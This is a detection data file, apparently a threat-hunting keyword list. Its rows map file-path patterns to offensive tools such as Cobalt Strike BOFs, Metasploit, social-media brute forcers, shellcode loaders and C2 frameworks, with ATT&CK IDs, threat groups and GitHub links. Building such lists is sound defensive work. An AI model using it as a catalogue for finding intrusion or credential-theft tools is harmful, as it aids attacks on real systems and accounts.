-*/Injection/uxsubclassinfo*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Injections/SQL.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*/injectsu.exp*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/injectsu.lib*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/injectsu.pdb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/injectsu/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/inline_syscall.git*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*/inline_syscall/include/in_memory_init.hpp*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*/inline-exec/*.exe,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/InlineWhispers*,offensive_tool_keyword,cobaltstrike,Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/InlineWhispers,1,1,N/A,10,10,286,42,2021-11-09T15:39:27Z,2020-12-25T16:52:50Z -*/insta-bf.git*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/samsesh/insta-bf,1,1,N/A,7,1,39,6,2021-12-23T17:41:12Z,2020-11-20T22:22:48Z -*/instabf.py*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/samsesh/insta-bf,1,1,N/A,7,1,39,6,2021-12-23T17:41:12Z,2020-11-20T22:22:48Z -*/instabrute.py*,offensive_tool_keyword,BruteSploit,BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text,T1110,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/BruteSploit,1,1,N/A,N/A,7,665,261,2020-04-05T00:29:26Z,2017-05-31T17:00:51Z -*/instainsane.git*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/umeshshinde19/instainsane,1,1,N/A,7,5,473,329,2023-08-22T21:49:22Z,2018-12-02T22:48:11Z -*/instainsane.sh*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/umeshshinde19/instainsane,1,1,N/A,7,5,473,329,2023-08-22T21:49:22Z,2018-12-02T22:48:11Z -*/install-sb.sh*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/samsesh/SocialBox-Termux,1,1,N/A,7,10,2417,268,2023-07-14T10:59:10Z,2019-03-28T18:07:05Z -*/insTof.py*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/samsesh/insta-bf,1,1,N/A,7,1,39,6,2021-12-23T17:41:12Z,2020-11-20T22:22:48Z -*/interactive_shell.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/interactsh/*,offensive_tool_keyword,interactsh,Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C5,T1566.002 - T1566.001 - T1071 - T1102,TA0011 - TA0001,N/A,N/A,C2,https://github.com/projectdiscovery/interactsh,1,1,FP risk - legitimate service abused by attackers - move to admintools ?,10,10,2675,317,2023-10-02T08:20:04Z,2021-01-29T14:31:51Z -*/interactsh-client*,offensive_tool_keyword,interactsh,Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C6,T1566.002 - T1566.001 - T1071 - T1102,TA0011 - TA0001,N/A,N/A,C2,https://github.com/projectdiscovery/interactsh,1,1,FP risk - legitimate service abused by attackers - move to admintools ?,10,10,2675,317,2023-10-02T08:20:04Z,2021-01-29T14:31:51Z -*/interactsh-collaborator*,offensive_tool_keyword,interactsh,Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C15,T1566.002 - T1566.001 - T1071 - T1102,TA0011 - TA0001,N/A,N/A,C2,https://github.com/projectdiscovery/interactsh,1,1,FP risk - legitimate service abused by attackers - move to admintools ?,10,10,2675,317,2023-10-02T08:20:04Z,2021-01-29T14:31:51Z -*/interactsh-server*,offensive_tool_keyword,interactsh,Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C8,T1566.002 - T1566.001 - T1071 - T1102,TA0011 - TA0001,N/A,N/A,C2,https://github.com/projectdiscovery/interactsh,1,1,FP risk - legitimate service abused by attackers - move to admintools ?,10,10,2675,317,2023-10-02T08:20:04Z,2021-01-29T14:31:51Z -*/internal/C2/*.go*,offensive_tool_keyword,GC2-sheet,GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.,T1071.002 - T1560 - T1105,TA0011 - TA0010 - TA0008,N/A,N/A,C2,https://github.com/looCiprian/GC2-sheet,1,1,N/A,10,10,449,89,2023-07-06T19:22:36Z,2021-09-15T19:06:12Z -*/internal/pipe/pipe.go*,offensive_tool_keyword,traitor,Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/liamg/traitor,1,1,N/A,N/A,10,6213,494,2023-03-16T16:21:13Z,2021-01-24T10:50:15Z -*/Internals/Coff.cs*,offensive_tool_keyword,cobaltstrike,A tool to run object files mainly beacon object files (BOF) in .Net.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nettitude/RunOF,1,1,N/A,10,10,129,22,2023-01-06T15:30:05Z,2022-02-21T13:53:39Z -*/Inveigh.git*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,1,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -*/Inveigh.txt*,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*/Invoke-Bof/*,offensive_tool_keyword,cobaltstrike,Load any Beacon Object File using Powershell!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/airbus-cert/Invoke-Bof,1,1,N/A,10,10,232,32,2021-12-09T15:10:41Z,2021-12-09T15:09:22Z -*/Invoke-HostEnum.ps1*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/red-team-scripts,1,1,N/A,10,10,1089,197,2019-11-18T05:30:18Z,2017-05-01T13:53:05Z -*/Invoke-RunAs.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1084,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/Invoke-SMBRemoting.git*,offensive_tool_keyword,Invoke-SMBRemoting,Interactive Shell and Command Execution over Named-Pipes (SMB),T1059 - T1021.002 - T1572,TA0002 - TA0008 - TA0011,N/A,N/A,Lateral Movement,https://github.com/Leo4j/Invoke-SMBRemoting,1,1,N/A,9,1,22,4,2023-10-02T10:21:34Z,2023-09-06T16:00:47Z -*/ip_spoof.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/IPayloadService.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/ip-forwarding.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/IPfuscation.cpp*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,0,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*/IPfuscation.exe*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*/ip-geolocation-geoplugin.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ip-geolocation-ipinfodb.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ip-geolocation-map-bing.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ip-geolocation-map-google.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ip-geolocation-map-kml.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ip-geolocation-maxmind.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ip-https-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ipidseq.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A 